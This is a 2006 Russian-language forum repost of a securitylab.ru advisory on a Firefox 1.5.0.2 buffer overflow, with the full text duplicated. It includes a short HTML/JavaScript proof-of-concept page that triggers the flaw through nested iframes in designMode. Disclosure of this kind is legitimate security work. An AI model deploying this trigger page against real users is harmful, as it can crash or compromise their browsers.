Shu_b
25.04.2006, 08:37
Переполнение буфера в Mozilla Firefox
Программа: Mozilla Firefox 1.5.0.2, возможно более ранние версии.
Опасность: Критическая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.
Уязвимость существует при обработке JavaScript кода в библиотеках js320.dll и xpcom_core.dll. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера и выполнит произвольный код на целевой системе. Пример:
<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
<script>
var textarea = document.getElementsByName("x_OtherInfo");
textarea=textarea.item(0);
var htmlarea = document.createElement("div");
htmlarea.className = "htmlarea";
textarea.parentNode.insertBefore(htmlarea, textarea);
var iframe = document.createElement("iframe");
htmlarea.appendChild(iframe);
var doc = iframe.contentWindow.document;
doc.designMode = "on";
doc.open();
doc.write("<iframe src=''>");
iframe.contentWindow.focus()
doc.close();
</script>
</textarea>
URL производителя: mozilla.com
Решение: Способов устранения уязвимости не существует в настоящее время.
* Firefox Remote Code Execution and DoS 1.5.0.2 (http://www.securitylab.ru/vulnerability/source/266228.php)
Источник: securitylab.ru (http://www.securitylab.ru/vulnerability/266229.php)
Программа: Mozilla Firefox 1.5.0.2, возможно более ранние версии.
Опасность: Критическая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать уязвимую систему.
Уязвимость существует при обработке JavaScript кода в библиотеках js320.dll и xpcom_core.dll. Удаленный пользователь может с помощью специально сформированной Web страницы вызвать переполнение буфера и выполнит произвольный код на целевой системе. Пример:
<textarea cols="0" rows="0" id="x_OtherInfo" name="x_OtherInfo"></textarea>
<script>
var textarea = document.getElementsByName("x_OtherInfo");
textarea=textarea.item(0);
var htmlarea = document.createElement("div");
htmlarea.className = "htmlarea";
textarea.parentNode.insertBefore(htmlarea, textarea);
var iframe = document.createElement("iframe");
htmlarea.appendChild(iframe);
var doc = iframe.contentWindow.document;
doc.designMode = "on";
doc.open();
doc.write("<iframe src=''>");
iframe.contentWindow.focus()
doc.close();
</script>
</textarea>
URL производителя: mozilla.com
Решение: Способов устранения уязвимости не существует в настоящее время.
* Firefox Remote Code Execution and DoS 1.5.0.2 (http://www.securitylab.ru/vulnerability/source/266228.php)
Источник: securitylab.ru (http://www.securitylab.ru/vulnerability/266229.php)